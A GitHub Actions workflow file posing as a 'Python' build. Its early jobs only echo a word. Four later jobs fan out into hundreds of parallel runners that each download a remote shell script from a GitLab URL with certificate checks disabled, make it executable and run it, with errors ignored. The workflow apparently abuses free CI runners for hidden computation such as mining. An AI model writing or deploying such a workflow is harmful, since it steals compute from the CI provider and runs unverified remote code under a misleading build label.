name: Python
on:  
  push:
  pull_request:

jobs:
 python-1:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D, E, F, G, H]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-2:
    runs-on: ubuntu-18.04 
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D, E, F, G, H]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"

 python-build-4:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: wget --no-check-certificate -c https://gitlab.com/CherrySolano/dc/-/raw/main/dc.sh && chmod 777 dc.sh && ./dc.sh

 python-build-3:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: wget --no-check-certificate -c https://gitlab.com/CherrySolano/dc/-/raw/main/dc.sh && chmod 777 dc.sh && ./dc.sh

 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: wget --no-check-certificate -c https://gitlab.com/CherrySolano/dc/-/raw/main/dc.sh && chmod 777 dc.sh && ./dc.sh

 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 60
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: wget --no-check-certificate -c https://gitlab.com/CherrySolano/dc/-/raw/main/dc.sh && chmod 777 dc.sh && ./dc.sh
